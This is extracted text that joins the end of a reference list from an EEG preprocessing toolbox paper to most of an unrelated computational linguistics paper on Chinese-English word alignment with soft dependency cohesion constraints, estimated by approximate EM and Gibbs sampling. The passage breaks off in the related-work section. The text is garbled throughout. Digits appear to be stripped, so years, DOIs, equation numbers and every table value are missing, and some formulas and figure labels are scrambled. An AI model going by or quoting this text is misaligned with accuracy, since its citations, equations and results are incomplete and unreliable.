an open source toolbox for analysis of single-trial eeg dynamics including independent component analysis. journal of neuroscience methods ( ): – doi . /j.jneumeth. . . . delorme a, mullen t, kothe c, akalin acar z, bigdely-shamlo n, vankov a, makeig s. . eeglab, sift, nft, bcilab, and erica: new tools for advanced eeg processing. computational intelligence and neuroscience : – doi . / / . delorme a, palmer j, onton j, oostenveld r, makeig s. . independent eeg sources are dipolar. plos one ( ):e doi . /journal.pone. . delorme a, sejnowski t, makeig s. . enhanced detection of artifacts in eeg data using higher-order statistics and independent component analysis. neuroimage ( ): – doi . /j.neuroimage. . . . frank rm, frishkoff ga. . automated protocol for evaluation of electromagnetic component separation (apecs): application of a framework for evaluating statistical methods of blink extraction from multichannel eeg. clinical neurophysiology ( ): – doi . /j.clinph. . . . gramfort a, luessi m, larson e, engemann da, strohmeier d, brodbeck c, goj r, jas m, brooks t, parkkonen l, hämäläinen m. . meg and eeg data analysis with mne-python. frontiers in neuroscience : doi . /j.neuroimage. . . . keil a, debener s, gratton g, junghöfer m, kappenman es, luck sj, luu p, miller ga, yee cm. . committee report: publication guidelines and recommendations for studies using electroencephalography and magnetoencephalography. psychophysiology ( ): – doi . /psyp. . lindsen jp, bhattacharya j. . correction of blink artifacts using independent component analysis and empirical mode decomposition. psychophysiology ( ): – doi . /j. - . . .x. mognon a, jovicich j, bruzzone l, buiatti m. . adjust: an automatic eeg artifact detector based on the joint use of spatial and temporal features. psychophysiology ( ): – doi . /j. - . . .x. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /fninf. . http://dx.doi.org/ . /fninf. . http://dx.doi.org/ . /j.jneumeth. . . http://dx.doi.org/ . / http://dx.doi.org/ . /j.jneumeth. . . http://dx.doi.org/ . /j.jneumeth. . . http://dx.doi.org/ . / / http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.neuroimage. . . http://dx.doi.org/ . /j.clinph. . . http://dx.doi.org/ . /j.neuroimage. . . http://dx.doi.org/ . /psyp. http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ nolan h, whelan r, reilly rb. . faster: fully automated statistical thresholding for eeg artifact rejection. journal of neuroscience methods ( ): – . oostenveld r, fries p, maris e, schoffelen j-m. . fieldtrip: open source software for advanced analysis of meg, eeg, and invasive electrophysiological data. computational intelligence and neuroscience : – doi . / / . ovaska k, laakso m, haapa-paananen s, louhimo r, chen p, aittomäki v, valo e, núñez-fontarnau j, rantanen v, karinen s, nousiainen k, lahesmaa-korpinen a-m, miettinen m, saarinen l, kohonen p, wu j, westermarck j, hautaniemi s. . large-scale data integration framework provides a comprehensive view on glioblastoma multiforme. genome medicine ( ): doi . /gm . peyk p, de cesarei a, junghöfer m. . electromagnetoencephalography software: overview and integration with other eeg/meg toolboxes. computational intelligence and neuroscience : – doi . / / . tadel f, baillet s, mosher jc, pantazis d, leahy rm. . brainstorm: a user-friendly application for meg/eeg analysis. computational intelligence and neuroscience : – doi . /conf.fnins. . . . taulu s, hari r. . removal of magnetoencephalographic artifacts with temporal signal-space separation: demonstration with single-trial auditory-evoked responses. human brain mapping ( ): – doi . /hbm. . toivanen m, pettersson k, lukander k. . a probabilistic real-time algorithm for detecting blinks, saccades, and fixations from eog data. journal of eye movement research ( ): – . tremblay a, newman aj. . modeling nonlinear relationships in erp data using mixed-effects regression with r examples. psychophysiology ( ): – doi . /psyp. . widmann a, schröger e. . filter effects and filter artifacts in the analysis of electrophysiological data. frontiers in psychology : doi . /fpsyg. . . cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / / http://dx.doi.org/ . /gm http://dx.doi.org/ . / / http://dx.doi.org/ . /conf.fnins. . . http://dx.doi.org/ . /hbm. http://dx.doi.org/ . /psyp. http://dx.doi.org/ . /fpsyg. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ computational testing for automated preprocessing: a matlab toolbox to enable large scale electroencephalography data processing ... introduction materials and methods results discussion conclusion flink references large-scale word alignment using soft dependency cohesion constraints zhiguo wang and chengqing zong national laboratory of pattern recognition institute of automation, chinese academy of sciences {zgwang, cqzong}@nlpr.ia.ac.cn abstract dependency cohesion refers to the observation that phrases dominated by disjoint dependency subtrees in the source language generally do not overlap in the target language. it has been verified to be a useful constraint for word alignment. however, previous work either treats this as a hard constraint or uses it as a feature in discriminative models, which is ineffective for large-scale tasks. in this paper, we take dependency cohesion as a soft constraint, and integrate it into a generative model for large-scale word alignment experiments. we also propose an approximate em algorithm and a gibbs sampling algorithm to estimate model parameters in an unsupervised manner. experiments on large-scale chinese-english translation tasks demonstrate that our model achieves improvements in both alignment quality and translation quality. introduction word alignment is the task of identifying word correspondences between parallel sentence pairs. word alignment has become a vital component of statistical machine translation (smt) systems, since it is required by almost all state-of-the-art smt systems for the purpose of extracting phrase tables or even syntactic transformation rules (koehn et al., ; galley et al., ). during the past two decades, generative word alignment models such as the ibm models (brown et al., ) and the hmm model (vogel et al., ) have been widely used, primarily because they are trained on bilingual sentences in an unsupervised manner and the implementation is freely available in the giza++ toolkit (och and ney, ). however, the word alignment quality of generative models is still far from satisfactory for smt systems. in recent years, discriminative alignment models incorporating linguistically motivated features have become increasingly popular (moore, ; taskar et al., ; riesa and marcu, ; saers et al., ; riesa et al., ). these models are usually trained with manually annotated parallel data. however, when moving to a new language pair, large amount of hand-aligned data are usually unavailable and expensive to create. a more practical way to improve large-scale word alignment quality is to introduce syntactic knowledge into a generative model and train the model in an unsupervised manner (wu, ; yamada and knight, ; lopez and resnik, ; denero and klein, ; pauls et al., ). in this paper, we take dependency cohesion (fox, ) into account, which assumes phrases dominated by disjoint dependency subtrees tend not to overlap after translation. instead of treating dependency cohesion as a hard constraint (lin and cherry, ) or using it as a feature in discriminative models (cherry and lin, b), we treat dependency cohesion as a distortion constraint, and integrate it into a modified hmm word alignment model to softly influence the probabilities of alignment candidates. we also propose an approximate em algorithm and an explicit gibbs sampling algorithm to train the model in an unsupervised manner. experiments on a large-scale chinese-english translation task demonstrate that our model achieves improvements in both word alignment quality and machine translation quality. the remainder of this paper is organized as follows: section introduces dependency cohesion transactions of the association for computational linguistics, ( ) – . action editor: chris callison-burch. submitted / ; published / . c© association for computational linguistics. constraint for word alignment. section presents our generative model for word alignment using dependency cohesion constraint. section describes algorithms for parameter estimation. we discuss and analyze the experiments in section . section gives the related work. finally, we conclude this paper and mention future work in section . dependency cohesion constraint for word alignment given a source (foreign) sentence 𝒇 𝐽 = 𝑓 , 𝑓 , … , 𝑓𝐽 and a target (english) sentence 𝒆 𝐼 = 𝑒 , 𝑒 , … , 𝑒𝐼 , the alignment 𝓐 between 𝒇 𝐽 and 𝒆 𝐼 is defined as a subset of the cartesian product of word positions: 𝓐 ∈ {(𝑗, 𝑖): 𝑗 = , … , 𝐽; 𝑖 = , … , 𝐼} when given the source side dependency tree 𝑇, we can project dependency subtrees in 𝑇 onto the target sentence through the alignment 𝓐 . dependency cohesion assumes projection spans of disjoint subtrees tend not to overlap. let 𝑇(𝑓𝑖 ) be the subtree of 𝑇 rooted at 𝑓𝑖, we define two kinds of projection span for the node 𝑓𝑖: subtree span and head span. the subtree span is the projection span of the total subtree 𝑇(𝑓𝑖 ), while the head span is the projection span of the node 𝑓𝑖 itself. following fox ( ) and lin and cherry ( ), we consider two types of dependency cohesion: head- modifier cohesion and modifier-modifier cohesion. head-modifier cohesion is defined as the subtree span of a node does not overlap with the head span of its head (parent) node, while modifier-modifier cohesion is defined as subtree spans of two nodes under the same head node do not overlap each other. we call a situation where cohesion is not maintained crossing. using the dependency tree in figure as an example, given the correct alignment “r”, the subtree span of “有/have” is [ , ] , and the head span of its head node “之一/one of” is [ , ]. they do not overlap each other, so the head-modifier cohesion is maintained. similarly, the subtree span of “少数/few” is [ , ], and it does not overlap the subtree span of “有/have”, so a modifier-modifier cohesion is maintained. however, when “r” is replaced with the incorrect alignment “w”, the subtree span of “有/have” becomes [ , ], and it overlaps the head span of its head “之一/one of”, so a head-modifier crossing occurs. meanwhile, the subtree spans of the two nodes “有/have” and “ 少数 /few” overlap each other, so a modifier- modifier crossing occurs. fox ( ) showed that dependency cohesion is generally maintained between english and french. to test how well this assumption holds between chinese and english, we measure the dependency cohesion between the two languages with a manually annotated bilingual chinese-english data set of sentence pairs . we use the head- modifier cohesion percentage (hcp) and the modifier-modifier cohesion percentage (mcp) to measure the degree of cohesion in the corpus. hcp (or mcp) is used for measuring how many head- modifier (or modifier-modifier) pairs are actually cohesive. table lists the relative percentages in both chinese-to-english (ch-en, using chinese side dependency trees) and english-to-chinese (en-ch, using english side dependency trees) directions. as we see from table , dependency cohesion is the data set is the development set used in section . 澳 洲 是 与 北 韩 有 的邦 交 少 数 国 家 。之 一 australia is one of the few countries that have diplomatic relations with north korea . figure : a chinese-english sentence pair including the word alignments and the chinese side dependency tree. the chinese and english words are listed horizontally and vertically, respectively. the black grids are gold-standard alignments. for the chinese word “有/have”, we give two alignment positions, where “r” is the correct alignment and “w” is the incorrect alignment. generally maintained between chinese and english. so dependency cohesion would be helpful for word alignment between chinese and english. however, there are still a number of crossings. if we restrict alignment space with a hard cohesion constraint, the correct alignments that result in crossings will be ruled out directly. in the next section, we describe an approach to integrating dependency cohesion constraint into a generative model to softly influence the probabilities of alignment candidates. we show that our new approach addresses the shortcomings of using dependency cohesion as a hard constraint. a generative word alignment model with dependency cohesion constraint the most influential generative word alignment models are the ibm models - and the hmm model (brown et al., ; vogel et al., ; och and ney, ). these models can be classified into sequence-based models (ibm models , and hmm) and fertility-based models (ibm models , and ). the sequence-based model is easier to implement, and recent experiments have shown that appropriately modified sequence-based model can produce comparable performance with fertility-based models (lopez and resnik, ; liang et al., ; denero and klein, ; zhao and gildea, ; bansal et al., ). so we built a generative word alignment model with dependency cohesion constraint based on the sequence-based model. . the sequence-based alignment model according to brown et al. ( ) and och and ney ( ), the sequence-based model is built as a noisy channel model, where the source sentence 𝒇 𝐽 and the alignment 𝒂 𝐽 are generated conditioning on the target sentence 𝒆 𝐼 . the model assumes each source word is assigned to exactly one target word, and defines an asymmetric alignment for the sentence pair as 𝒂 𝐽 = 𝑎 , 𝑎 , … , 𝑎𝑗 , … , 𝑎𝐽 , where each 𝑎𝑗 ∈ [ , 𝐼] is an alignment from the source position j to the target position 𝑎𝑗 , 𝑎𝑗 = means 𝑓𝑗 is not aligned with any target words. the sequence-based model divides alignment procedure into two stages (distortion and translation) and factors as: 𝑝(𝒇 𝐽 , 𝒂 𝐽 |𝒆 𝐼 ) = ∏ 𝑝𝑑 (𝑎𝑗 |𝑎𝑗− , 𝐼)𝑝𝑡 (𝑓𝑗 |𝑒𝑎𝑗 ) 𝐽 𝑗= ( ) where 𝑝𝑑 is the distortion model and 𝑝𝑡 is the translation model. ibm models , and the hmm model all assume the same translation model 𝑝𝑡 (𝑓𝑗 |𝑒𝑎𝑗 ) . however, they use three different distortion models. ibm model assumes a uniform distortion probability /(i+ ), ibm model assumes 𝑝𝑑 (𝑎𝑗 |𝑗) that depends on word position j and hmm model assumes 𝑝𝑑 (𝑎𝑗 |𝑎𝑗− , 𝐼) that depends on the previous alignment 𝑎𝑗− . recently, tree distance models (lopez and resnik, ; denero and klein, ) formulate the distortion model as 𝑝𝑑 (𝑎𝑗 |𝑎𝑗− , 𝑇) , where the distance between 𝑎𝑗 and 𝑎𝑗− are calculated by walking through the phrase (or dependency) tree t. . proposed model to integrate dependency cohesion constraint into a generative model, we refine the sequence-based model in two ways with the help of the source side dependency tree 𝑇𝑓 . first, we design a new word alignment order. in the sequence-based model, source words are aligned from left to right by taking source sentence as a linear sequence. however, to apply dependency cohesion constraint, the subtree span of a head node is computed based on the alignments of its children, so children must be aligned before the head node. riesa and marcu ( ) propose a hierarchical search procedure to traverse all nodes in a phrase structure tree. similarly, we define a bottom-up topological order (but-order) to traverse all words in the source side dependency tree 𝑇𝑓 . in the but-order, tree nodes are aligned bottom-up with 𝑇𝑓 as a backbone. for all children under the same head node, left children are aligned from right to left, and then right children are aligned from left to right. for example, the but-order for the following dependency tree is “c b e f d a h g”. a hgfedcb ch-en en-ch hcp mcp hcp mcp . . . . table : cohesion percentages (%) of a manually annotated data set between chinese and english. for the sake of clarity, we define a function to map all nodes in 𝑇𝑓 into their but-order, and notate it as but(𝑇𝑓 ) = 𝜋 , 𝜋 , … , 𝜋𝑗 , … , 𝜋𝐽 , where 𝜋𝑗 means the j-th node in but-order is the 𝜋𝑗 -th word in the original source sentence. we arrange alignment sequence 𝒂 𝐽 according the but-order and notate it as 𝒂[ ,𝐽] = 𝑎𝜋 , … , 𝑎𝜋𝑗 , … , 𝑎𝜋𝐽 , where 𝑎𝜋𝑗 is the aligned position for a node 𝑓𝜋𝑗 . we also notate the sub-sequence 𝑎𝜋𝑖 , … , 𝑎𝜋𝑗 as 𝒂[𝑖,𝑗]. second, we keep the same translation model as the sequence-based model and integrate the dependency cohesion constraints into the distortion model. the main idea is to influence the distortion procedure with the dependency cohesion constraints. assume node 𝑓ℎ and node 𝑓𝑚 are a head-modifier pair in 𝑇𝑓 , where 𝑓ℎ is the head and 𝑓𝑚 is the modifier. the head-modifier cohesion relationship between them is notated as 𝒽ℎ,𝑚 ∈ {𝑐𝑜ℎ𝑒𝑠𝑖𝑜𝑛, 𝑐𝑟𝑜𝑠𝑠𝑖𝑛𝑔} . when the head-modifier cohesion is maintained 𝒽ℎ,𝑚 = 𝑐𝑜ℎ𝑒𝑠𝑖𝑜𝑛, otherwise 𝒽ℎ,𝑚 = 𝑐𝑟𝑜𝑠𝑠𝑖𝑛𝑔 . we represent the set of head- modifier cohesion relationships for all the head- modifier pairs in 𝑇𝑓 as: 𝑯 = {𝒽ℎ,𝑚 | ℎ ∈ [ , 𝐽], 𝑚 ∈ [ , 𝐽], ℎ ≠ 𝑚, 𝑓ℎ and 𝑓𝑚 are a head-modifier pair in 𝑇𝑓 } the set of head-modifier cohesion relationships for all the head-modifier pairs taking 𝑓ℎ as the head node can be represented as: 𝓱ℎ = {𝒽ℎ,𝑚 | 𝑚 ∈ [ , 𝐽], 𝑚 ≠ ℎ, 𝑓ℎ and 𝑓𝑚 are a head-modifier pair in 𝑇𝑓 } obviously, 𝑯 = ⋃ 𝓱ℎ 𝐽 ℎ= . similarly, we assume node 𝑓𝑘 and node 𝑓𝑙 are a modifier-modifier pair in 𝑇𝑓 . to avoid repetition, we assume 𝑓𝑘 is the node sitting at the position after 𝑓𝑙 in but-order and call 𝑓𝑘 as the higher- order node of the pair. the modifier-modifier cohesion relationship between them is notated as 𝓂𝑘,𝑙 ∈ {𝑐𝑜ℎ𝑒𝑠𝑖𝑜𝑛, 𝑐𝑟𝑜𝑠𝑠𝑖𝑛𝑔} . when the modifier- modifier cohesion is maintained 𝓂𝑘,𝑙 = 𝑐𝑜ℎ𝑒𝑠𝑖𝑜𝑛 , otherwise 𝓂𝑘,𝑙 = 𝑐𝑟𝑜𝑠𝑠𝑖𝑛𝑔. we represent the set of modifier-modifier cohesion relationships for all the modifier-modifier pairs in 𝑇𝑓 as: 𝑴 = {𝓂𝑘,𝑙 | 𝑘 ∈ [ , 𝐽], 𝑙 ∈ [ , 𝐽], 𝑘 ≠ 𝑙, 𝑓𝑘 and 𝑓𝑙 are a modifier-modifier pair in 𝑇𝑓 } the set of modifier-modifier cohesion relationships for all the modifier-modifier pairs taking 𝑓𝑘 as the higher-order node can be represented as: 𝓶𝑘 = {𝓂𝑘,𝑙 | 𝑙 ∈ [ , 𝐽], 𝑙 ≠ 𝑘, 𝑓𝑘 and 𝑓𝑙 are a modifier-modifier pair in 𝑇𝑓 } obviously, 𝑴 = ⋃ 𝓶𝑘 𝐽 𝑘= . with the above notations, we formulate the distortion probability for a node 𝑓𝜋𝑗 as 𝑝𝑑 (𝑎𝜋𝑗 , 𝓱𝜋𝑗 , 𝓶𝜋𝑗 |𝒂[ ,𝑗− ]). according to eq. ( ) and the two improvements, we formulated our model as: 𝑝(𝒇 𝐽 , 𝒂[ ,𝐽]|𝒆 𝐼 , 𝑇𝑓 ) = 𝑝(𝒂[ ,𝐽], 𝑯, 𝑴, 𝒇 𝐽 , |𝒆 𝐼 , 𝑇𝑓 ) ≈ ∏ 𝑝𝑑 (𝑎𝜋𝑗 , 𝓱𝜋𝑗 , 𝓶𝜋𝑗 |𝒂[ ,𝑗− ]) 𝑝𝑡 (𝑓𝜋𝑗 |𝑒𝑎𝜋𝑗 )𝜋𝑗∈𝐵𝑈𝑇(𝑇𝑓) ( ) here, we use the approximation symbol, because the right hand side is not guaranteed to be normalized. in practice, we only compute ratios of these terms, so it is not actually a problem. such model is called deficient (brown et al., ), and many successful unsupervised models are deficient, e.g., ibm model and ibm model . . dependency cohesive distortion model we assume the distortion procedure is influenced by three factors: words distance, head-modifier cohesion and modifier-modifier cohesion. therefore, we further decompose the distortion model 𝑝𝑑 into three terms as follows: 𝑝𝑑 (𝑎𝜋𝑗 , 𝓱𝜋𝑗 , 𝓶𝜋𝑗 |𝒂[ ,𝑗− ]) = 𝑝 (𝑎𝜋𝑗 |𝒂[ ,𝑗− ]) 𝑝 (𝓱𝜋𝑗 |𝒂[ ,𝑗]) 𝑝 (𝓶𝜋𝑗 |𝒂[ ,𝑗], 𝓱𝜋𝑗 ) ≈ 𝑝𝑤𝑑 (𝑎𝜋𝑗 |𝑎𝜋𝑗− , 𝐼) 𝑝ℎ𝑐 (𝓱𝜋𝑗 |𝒂[ ,𝑗]) 𝑝𝑚𝑐 (𝓶𝜋𝑗 |𝒂[ ,𝑗]) ( ) where 𝑝𝑤𝑑 is the words distance term, 𝑝ℎ𝑐 is the head-modifier cohesion term and 𝑝𝑚𝑐 is the modifier-modifier cohesion term. the word distance term 𝑝𝑤𝑑 has been verified to be very useful in the hmm alignment model. however, in our model, the word distance is calculated based on the previous node in but- order rather than the previous word in the original sentence. we follow the hmm word alignment model (vogel et al., ) and parameterize 𝑝𝑤𝑑 in terms of the jump width: 𝑝𝑤𝑑 (𝑖|𝑖 ′, 𝐼) = 𝑐(𝑖−𝑖′ ) ∑ 𝑐(𝑖′′ −𝑖′)𝑖′′ ( ) where 𝑐() is the count of jump width. the head-modifier cohesion term 𝑝ℎ𝑐 is used to penalize the distortion probability according to relationships between the head node and its children (modifiers). therefore, we define 𝑝ℎ𝑐 as the product of probabilities for all head-modifier pairs taking 𝑓𝜋𝑗 as head node: 𝑝ℎ𝑐 (𝓱𝜋𝑗 |𝒂[ ,𝑗]) = ∏ 𝑝ℎ (𝒽𝜋𝑗,𝑐 |𝑓𝑐 , 𝑒𝑎𝜋𝑗 , 𝑒𝑎𝑐 )𝒽𝜋𝑗,𝑐∈𝓱𝜋𝑗 ( ) where 𝒽𝜋𝑗,𝑐 ∈ {𝑐𝑜ℎ𝑒𝑠𝑖𝑜𝑛, 𝑐𝑟𝑜𝑠𝑠𝑖𝑛𝑔} is the head- modifier cohesion relationship between 𝑓𝜋𝑗 and one of its child 𝑓𝑐 , 𝑝ℎ is the corresponding probability, 𝑒𝑎𝜋𝑗 and 𝑒𝑎𝑐 are the aligned words for 𝑓𝜋𝑗 and 𝑓𝑐. similarly, the modifier-modifier cohesion term 𝑝𝑚𝑐 is used to penalize the distortion probability according to relationships between 𝑓𝜋𝑗 and its siblings. therefore, we define 𝑝𝑚𝑐 as the product of probabilities for all the modifier-modifier pairs taking 𝑓𝜋𝑗 as the higher-order node: 𝑝𝑚𝑐 (𝓶𝜋𝑗 |𝒂[ ,𝑗] ) = ∏ 𝑝𝑚 (𝓂𝜋𝑗,𝑠 |𝑓𝑠 , 𝑒𝑎𝜋𝑗 , 𝑒𝑎𝑠 )𝓂𝜋𝑗,𝑠∈𝓶𝜋𝑗 ( ) where 𝓂𝜋𝑗,𝑠 ∈ {𝑐𝑜ℎ𝑒𝑠𝑖𝑜𝑛, 𝑐𝑟𝑜𝑠𝑠𝑖𝑛𝑔} is the modifier- modifier cohesion relationship between 𝑓𝜋𝑗 and one of its sibling 𝑓𝑠 , 𝑝𝑚 is the corresponding probability, 𝑒𝑎𝜋𝑗 and 𝑒𝑎𝑠 are the aligned words for 𝑓𝜋𝑗 and 𝑓𝑠. both 𝑝ℎ and 𝑝𝑚 in eq. ( ) and eq. ( ) are conditioned on three words, which would make them very sparse. to cope with this problem, we use the word clustering toolkit, mkcls (och et al., ), to cluster all words into classes, and replace the three words with their classes. parameter estimation to align sentence pairs with the model in eq. ( ), we have to estimate some parameters: 𝑝𝑡, 𝑝𝑤𝑑, 𝑝ℎ and 𝑝𝑚 . the traditional approach for sequence- based models uses expectation maximization (em) algorithm to estimate parameters. however, in our model, it is hard to find an efficient way to sum over all the possible alignments, which is required in the e-step of em algorithm. therefore, we propose an approximate em algorithm and a gibbs sampling algorithm for parameter estimation. . approximate em algorithm the approximate em algorithm is similar to the training algorithm for fertility-based alignment models (och and ney, ). the main idea is to enumerate only a small subset of good alignments in the e-step, then collect expectation counts and estimate parameters among the small subset in m- step. following with och and ney ( ), we employ neighbor alignments of the viterbi alignment as the small subset. neighbor alignments are obtained by performing one swap or move operation over the viterbi alignment. obtaining the viterbi alignment itself is not so easy for our model. therefore, we take the viterbi alignment of the sequence-based model (hmm model) as the starting point, and iterate the hill- climbing algorithm (brown et al., ) many times to get the best alignment greedily. in each iteration, we find the best alignment with eq. ( ) among neighbor alignments of the initial point, and then make the best alignment as the initial point for the next iteration. the algorithm iterates until no update could be made. . gibbs sampling algorithm gibbs sampling is another effective algorithm for unsupervised learning problems. as is described in the literatures (johnson et al., ; gao and johnson, ), there are two types of gibbs samplers: explicit and collapsed. an explicit sampler represents and samples the model parameters in addition to the word alignments, while in a collapsed sampler the parameters are integrated out and only alignments are sampled. mermer and saraçlar ( ) proposed a collapsed sampler for ibm model . however, their sampler updates parameters constantly and thus cannot run efficiently on large-scale tasks. instead, we take advantage of explicit gibbs sampling to make a highly parallelizable sampler. our gibbs sampler is similar to the mcmc algorithm in zhao and gildea ( ), but we assume dirichlet priors when sampling model parameters and take a different sampling approach based on the source side dependency tree. our sampler performs a sequence of consecutive iterations. each iteration consists of two sampling steps. the first step samples the aligned position for each dependency node according to the but- order. concretely, when sampling the aligned position 𝑎𝜋𝑗 (𝑡+ ) for node 𝑓𝜋𝑗 on iteration 𝑡+ , the aligned positions for 𝒂[ ,𝑗− ] are fixed on the new sampling results 𝒂[ ,𝑗− ] (𝑡+ ) on iteration 𝑡 + , and the aligned positions for 𝒂[𝑗+ ,𝐽] are fixed on the old sampling results 𝒂[𝑗+ ,𝐽] (𝑡) on iteration 𝑡 . therefore, we sample the aligned position 𝑎𝜋𝑗 (𝑡+ ) as follows: 𝑎𝜋𝑗 (𝑡+ ) ~ 𝑝 (𝑎𝜋𝑗 |𝒂[ ,𝑗− ] (𝑡+ ) , 𝒂[𝑗+ ,𝐽] (𝑡) , 𝑓 𝐽 , 𝑒 𝐼 ) = 𝑝 (𝒇 𝐽 , �̂�𝑎𝜋𝑗 |𝒆 𝐼 ) ∑ 𝑝 (𝒇 𝐽 , �̂�𝑎𝜋𝑗 |𝒆 𝐼 )𝑎𝜋𝑗 ∈{ , ,…,𝐼} ( ) where �̂�𝑎𝜋𝑗 = 𝒂 [ ,𝑗− ] (𝑡+ ) ∪ 𝑎𝜋𝑗 ∪ 𝒂[𝑗+ ,𝐽] (𝑡) , the numerator is the probability of aligning 𝑓𝜋𝑗 with 𝑒𝑎𝜋𝑗 (the alignments for other nodes are fixed at 𝒂[ ,𝑗− ] (𝑡+ ) and 𝒂[𝑗+ ,𝐽] (𝑡) ) calculated with eq. ( ), and the denominator is the summation of the probabilities of aligning 𝑓𝜋𝑗 with each target word. the second step of our sampler calculates parameters 𝑝𝑡, 𝑝𝑤𝑑, 𝑝ℎ and 𝑝𝑚 using their counts, where all these counts can be easily collected during the first sampling step. because all these parameters follow multinomial distributions, we consider dirichlet priors for them, which would greatly simplify the inference procedure. in the first sampling step, all the sentence pairs are processed independently. so we can make this step parallel and process all the sentence pairs efficiently with multi-threads. when using the gibbs sampler for decoding, we just ignore the second sampling step and iterate the first sampling step many times. experiments we performed a series of experiments to evaluate our model. all the experiments are conducted on the chinese-english language pair. we employ two training sets: fbis and large. the size and source corpus of these training sets are listed in table . we will use the smaller training set fbis to evaluate the characters of our model and use the large training set to evaluate whether our model is adaptable for large-scale task. for word alignment quality evaluation, we take the hand- aligned data sets from ssmt , which contains http://nlp.ict.ac.cn/guidelines/guidelines- - ssmt(english).doc sentence pairs in the testing set and sentence pairs in the development set. following och and ney ( ), we evaluate word alignment quality with the alignment error rate (aer), where lower aer is better. because our model takes dependency trees as input, we parse both sides of the two training sets, the development set and the testing set with berkeley parser (petrov et al., ), and then convert the generated phrase trees into dependency trees according to wang and zong ( ; ). our model is an asymmetric model, so we perform word alignment in both forward (chineseenglish) and reverse (englishchinese) directions. . effectiveness of cohesion constraints in eq. ( ), the distortion probability 𝑝𝑑 is decomposed into three terms: 𝑝𝑤𝑑 , 𝑝ℎ𝑐 and 𝑝𝑚𝑐 . to study whether cohesion constraints are effective for word alignment, we construct four sub-models as follows: ( ) wd: 𝑝𝑑 = 𝑝𝑤𝑑; ( ) wd-hc: 𝑝𝑑 = 𝑝𝑤𝑑 ∙ 𝑝ℎ𝑐; ( ) wd-mc: 𝑝𝑑 = 𝑝𝑤𝑑 ∙ 𝑝𝑚𝑐; ( ) wd-hc-mc: 𝑝𝑑 = 𝑝𝑤𝑑 ∙ 𝑝ℎ𝑐 ∙ 𝑝𝑚𝑐. we train these four models with the approximate em and the gibbs sampling algorithms on the fbis training set. for approximate em algorithm, we first train a hmm model (with iterations of ibm model and iterations of hmm model), then train these four sub-models with iterations of the approximate em algorithm. for gibbs sampling, we choose symmetric dirichlet priors identically with all hyper-parameters equals . to obtain a sparse dirichlet prior. then, we make the alignments produced by the hmm model as the initial points, and train these sub-models with iterations of the gibbs sampling. aers on the development set are listed in table . we can easily find: ) when employing the head-modifier cohesion constraint, the wd-hc model yields better aers than the wd model; ) train set source corpus # words fbis fbis newswire data ch: . m en: . m large ldc t , ldc e , ldc e , ldc t , ldc t , ldc l , ldc t , ldc t ch: . m en: . m table : the size and the source corpus of the two training sets. when employing the modifier-modifier cohesion constraint, the wd-mc model also yields better aers than the wd model; and ) when employing both head-modifier cohesion constraint and modifier-modifier cohesion constraint together, the wd-hc-mc model yields the best aers among the four sub-models. so both head-modifier cohesion constraint and modifier-modifier cohesion constraint are helpful for word alignment. table also shows that the approximate em algorithm yields better aers in the forward direction than reverse direction, while the gibbs sampling algorithm yields close aers in both directions. . comparison with state-of-the-art models to show the effectiveness of our model, we compare our model with some of the state-of-the- art models. all the systems are listed as follows: ) ibm : the fertility-based model (ibm model ) which is implemented in giza++ toolkit. the training scheme is iterations of ibm model , iterations of the hmm model and iterations of ibm model . ) ibm -l : a modification to the giza++ toolkit which extends ibm models with ℓ - norm (vaswani et al., ). the training scheme is the same as ibm . ) ibm -prior: a modification to the giza++ toolkit which extends the translation model of ibm models with dirichlet priors (riley and gildea, ). the training scheme is the same as ibm . ) agree-hmm: the hmm alignment model by jointly training the forward and reverse models (liang et al., ), which is implemented in the berkeleyaligner. the training scheme is iterations of jointly training ibm model and iterations of jointly training hmm model. ) tree-distance: the tree distance alignment model proposed in denero and klein ( ), which is implemented in the berkeleyaligner. the training scheme is iterations of jointly training ibm model and iterations of jointly training the tree distance model. ) hard-cohesion: the implemented “cohesion checking algorithm” (lin and cherry, ) which takes dependency cohesion as a hard constraint during beam search word alignment decoding. we use the model trained by the agree-hmm system to estimate alignment candidates. we also build two systems for our soft dependency cohesion model: ) soft-cohesion-em: the wd-hc-mc sub-model trained with the approximate em algorithm as described in sub-section . . ) soft-cohesion-gibbs: the wd-hc-mc sub-model trained with the gibbs sampling algorithm as described in sub-section . . we train all these systems on the fbis training set, and test them on the testing set. we also combine the forward and reverse alignments with the grow-diag-final-and (gdfa) heuristic (koehn et al., ). all aers are listed in table . we find our soft cohesion systems produce better aers than the hard-cohesion system as well as the other systems. table gives the head-modifier cohesion percentage (hcp) and the modifier- modifier cohesion percentage (mcp) of each system. we find hcps and mcps of our soft cohesion systems are much closer to the gold- standard alignments. to evaluate whether our model is adaptable for large-scale task, we retrained these systems using the large training set. aers on the testing set are listed in table . compared with table , we tree-distance system requires too much memory to run on our server when using the large data set, so we can’t get the result. forward reverse gdfa ibm . . . ibm -l . . . ibm -prior . . . agree-hmm . . . tree-distance . . . hard-cohesion . . . soft-cohesion-em . . . soft-cohesion-gibbs . . . table : aers on the testing set (trained on the fbis data set). em gibbs forward reverse forward reverse wd . . . . wd-hc . . . . wd-mc . . . . wd-hc-mc . . . . table : aers on the development set (trained on the fbis data set). find all the systems yield better performance when using more training data. our soft cohesion systems still produce better aers than other systems, suggesting that our soft cohesion model is very effective for large-scale word alignment tasks. . machine translation quality comparison we then evaluate the effect of word alignment on machine translation quality using the phrase-based translation system moses (koehn et al., ). we take nist mt test data as the development set, nist mt test data as the testing set. we train a -gram language model with the xinhua portion of english gigaword corpus and the english side of the training set using the srilm toolkit (stolcke, ). we train machine translation models using gdfa alignments of each system. bleu scores on nist mt are listed in table , where bleu scores are calculated using lowercased and tokenized data (papineni et al., ). although the ibm -l , agree-hmm, tree-distance and hard-cohesion systems improve word alignment than ibm , they fail to outperform the ibm system on machine translation. the bleu score of our soft-cohesion-em system is better than the ibm system when using the fbis training set, but worse when using the large training set. our soft-cohesion-gibbs system produces the best bleu score when using both training sets. we also performed a statistical significance test using bootstrap resampling with samples (koehn, ; zhang et al., ). experimental results show the soft-cohesion-gibbs system is significantly better (p< . ) than the ibm system. the ibm -prior system slightly outperforms ibm , but it’s not significant. related work there have been many proposals of integrating syntactic knowledge into generative alignment 